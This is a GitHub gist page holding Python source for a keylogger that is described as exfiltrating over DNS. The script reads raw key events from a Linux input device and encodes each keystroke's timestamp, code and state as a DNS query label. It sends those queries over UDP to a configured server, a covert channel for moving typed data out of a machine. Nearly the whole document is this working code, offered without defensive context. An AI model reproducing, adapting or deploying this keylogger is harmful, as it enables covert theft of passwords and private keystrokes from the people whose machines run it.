Skip to content

Instantly share code, notes, and snippets.

@OwenChia
Created July 8, 2019 15:41
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save OwenChia/1fb995ff48b916c269e978bfe9a95c45 to your computer and use it in GitHub Desktop.
Save OwenChia/1fb995ff48b916c269e978bfe9a95c45 to your computer and use it in GitHub Desktop.
keylogger via dns written by pure python
# -*- coding: utf-8 -*-
import selectors
import socket
from ctypes import BigEndianStructure, Structure, c_int32, c_int64, c_uint16
from enum import IntEnum
from functools import partial
EV_KEY = 1
EV_KEY_VALUE = {0: '\x1b[31mreleased\x1b[0m',
1: '\x1b[32mdepressed\x1b[0m',
2: '\x1b[33mrepeated\x1b[0m'}
EV_KEY_VALUE_UNKNOWN = '\x1b[37;41;5munknown\x1b[0m'
DNSLOG_SERVER = ('192.168.1.1', 53)
DNSLOG_DOMAIN = 'example.org'
EV_DEVICE = "/dev/input/event0"
class QR(IntEnum):
query = 0
response = 1
class OPCODE(IntEnum):
query = 0
iquery = 1
status = 2
class QTYPE(IntEnum):
A = 1
NS = 2
MD = 3
MF = 4
CNAME = 5
SOA = 6
MB = 7
MG = 8
MR = 9
NULL = 10
WKS = 11
PTR = 12
HINFO = 13
MINFO = 14
MX = 15
TXT = 16
AXFR = 252
MAILB = 253
MAILA = 254
ALL = 255
class QCLASS(IntEnum):
IN = 1
CS = 2
CH = 3
HS = 4
ANY = 255
class DNSHeader(BigEndianStructure):
_fields_ = [('ID', c_uint16),
('QR', c_uint16, 1),
('Opcode', c_uint16, 4),
('AA', c_uint16, 1),
('TC', c_uint16, 1),
('RD', c_uint16, 1),
('RA', c_uint16, 1),
('Z', c_uint16, 3),
('RCODE', c_uint16, 4),
('QDCOUNT', c_uint16),
('ANCOUNT', c_uint16),
('NSCOUNT', c_uint16),
('ARCOUNT', c_uint16)]
class InputEvent(Structure):
'''
struct timeval {
int64_t tv_sec,
int64_t tv_usec,
}
struct input_event {
struct timeval time,
uint16 type,
uint16 code,
int32 value,
}
'''
_fields_ = [('time__tv_sec', c_int64),
('time__tv_usec', c_int64),
('type', c_uint16),
('code', c_uint16),
('value', c_int32)]
def dns_question(qname: str, qtype: QTYPE = QTYPE.A, qclass: QCLASS = QCLASS.IN) -> bytes:
question = []
for it in qname.split('.'):
question.append(bytes([len(it)]))
question.append(it.encode())
question.append(bytes([0]))
question.append(qtype.to_bytes(2, byteorder='big'))
question.append(qclass.to_bytes(2, byteorder='big'))
return b''.join(question)
def send_dns_pack(data: str, dnsh: DNSHeader):
dnsq = dns_question('.'.join([data, DNSLOG_DOMAIN]))
pack = bytes(dnsh) + dnsq
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.sendto(pack, DNSLOG_SERVER)
sel.register(sock, selectors.EVENT_READ, lambda sock, mask: sock.recvfrom(1024))
def process(fd, mask):
ev = InputEvent()
fd.readinto(ev)
while ev.type != EV_KEY:
fd.readinto(ev)
print(ev.time__tv_sec, ev.time__tv_usec, ev.code,
EV_KEY_VALUE.get(ev.value, EV_KEY_VALUE_UNKNOWN), sep='\t')
send_dns("{:d}-{:d}-{:d}".format(ev.time__tv_sec, ev.code, ev.value))
if __name__ == '__main__':
dnsh = DNSHeader(ID=0xaaaa,
QR=QR.query,
Opcode=OPCODE.query,
AA=0,
TC=0,
RD=1,
RA=0,
Z=0,
RCODE=0,
QDCOUNT=1,
ANCOUNT=0,
NSCOUNT=0,
ARCOUNT=0)
send_dns = partial(send_dns_pack, dnsh=dnsh)
with open(EV_DEVICE, 'rb') as fd:
sel = selectors.DefaultSelector()
sel.register(fd, selectors.EVENT_READ, process)
try:
while True:
events = sel.select()
for key, mask in events:
callback = key.data
callback(key.fileobj, mask)
except KeyboardInterrupt:
print()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment